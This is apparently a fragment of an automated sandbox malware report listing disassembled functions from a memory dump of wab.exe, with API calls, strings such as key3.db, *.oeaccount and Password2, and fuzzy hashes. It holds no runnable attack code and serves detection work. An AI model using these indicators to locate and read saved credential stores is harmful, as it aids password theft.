                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9417F72A00209EBDF00CF95CC41ADE7BB5FF48315F14452AF614A7280D778DAA5CB99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                      • Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                      • Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
• memset.MSVCRT ref: 0040A8F8
  • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
• sprintf.MSVCRT ref: 0040A93D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 3337535707-2769808009
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID:
• API String ID: 125969286-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetParent.USER32(?), ref: 00408E33
• GetWindowRect.USER32(?,?), ref: 00408E40
• GetClientRect.USER32(00000000,?), ref: 00408E4B
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
  • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
  • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
• SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
  • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
  • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
  • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
  • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
• SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
• SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
• SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
• String ID:
• API String ID: 2374668499-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• memset.MSVCRT ref: 0040AAB7
• memset.MSVCRT ref: 0040AACD
  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
• sprintf.MSVCRT ref: 0040AB04
Strings
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
• <%s>, xrefs: 0040AAFE
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
• String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3699762281-1998499579
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                        • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                                                        • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                      • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                                                        • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                                                        • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00410125
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00410133
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 0041013B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                                                                                      • Opcode ID: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                      • Instruction ID: 15b5804eddbfc7b45e8a586a0394ac07707e7803bdc14c23b44bbc646b24dc1f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 627087e029a1abcb04561e415bb5884c82ccbbb1204662b743e4c0e852913d63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DF0F935100508BBDF116FA5DC09EDE3B25FF05711F10813AFA15585B1CBFAD9A09B58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,C@,004069F3,00000000,?,?,00000000), ref: 0040688C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004068B2
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??3@YAXPAX@Z.MSVCRT ref: 00407698
                                                                                                                                                                                                                        • Part of subcall function 00407691: ??2@YAPAXI@Z.MSVCRT ref: 004076A6
                                                                                                                                                                                                                        • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: C@$key3.db
                                                                                                                                                                                                                      • API String ID: 1968906679-1993167907
                                                                                                                                                                                                                      • Opcode ID: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                      • Instruction ID: 0ede60c3f523747ec885d841e26685764e9001b1461c3323211a21065397dc39
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8070846350ac793f35cf726ef4b9da8142e130784681131c85812774ce581970
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9811D3B2D00514AFDB10AF19CC4588E7BA5EF46360B12807BF80AAB291DB34DD60CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                                                        • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                      • API String ID: 3492281209-168460110
                                                                                                                                                                                                                      • Opcode ID: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                      • Instruction ID: 91d7546927304a6081eb6d9f577e17eac68e9825403057b28fc40c6b5cfff950
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b978f582ba89fecee05bf5e4b747a5653f5ca03fd4d42c103354d0125bbd5b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F0A775A407047BEB3267A0EC47F4A7BACAB41B41F104535F651B51F2D6F4B544CB48
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                                                                                      • Opcode ID: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                                      • Instruction ID: 847e1e856ca93c5331a43762777f09d1dcd0b535ae5450603ebfd434222f9f24
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed2b804169d995c812202dfe57b894f8811318f38427dff4b8ba9102b7fae148
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3E09B73C5412E7AEB21B6A4DC01FE6776CEF55705F0000F7B945E10C1E5B45A888B95
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: strlen$_mbscat
• String ID: 8D
• API String ID: 3951308622-2703402624
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$_mbscpy
• String ID: Password2
• API String ID: 2600922555-1856559283
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathA$shell32.dll
• API String ID: 2574300362-543337301
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: rows deleted
• API String ID: 2221118986-571615504
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: +MA$psow$winOpen
• API String ID: 2221118986-3077801942
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• variable number must be between ?1 and ?%d, xrefs: 0042BC19
• too many SQL variables, xrefs: 0042BD54
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: too many SQL variables$variable number must be between ?1 and ?%d
• API String ID: 2221118986-515162456
                                                                                                                                                                                                                      • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                      • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                      • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                      • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                      • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                                                        • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                        • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                        • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1593657333-0
                                                                                                                                                                                                                      • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                      • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3798638045-0
                                                                                                                                                                                                                      • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                      • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                                                        • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                                                      • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4107816708-0
                                                                                                                                                                                                                      • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                      • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                                                                                      • API String ID: 39653677-3911187716
                                                                                                                                                                                                                      • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                      • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
Uniqueness

Uniqueness Score: -1.00%

APIs
• strlen.MSVCRT ref: 00407709
• ??3@YAXPAX@Z.MSVCRT ref: 00407729
  • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
  • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
  • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
• ??3@YAXPAX@Z.MSVCRT ref: 0040774C
• memcpy.MSVCRT ref: 0040776C
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
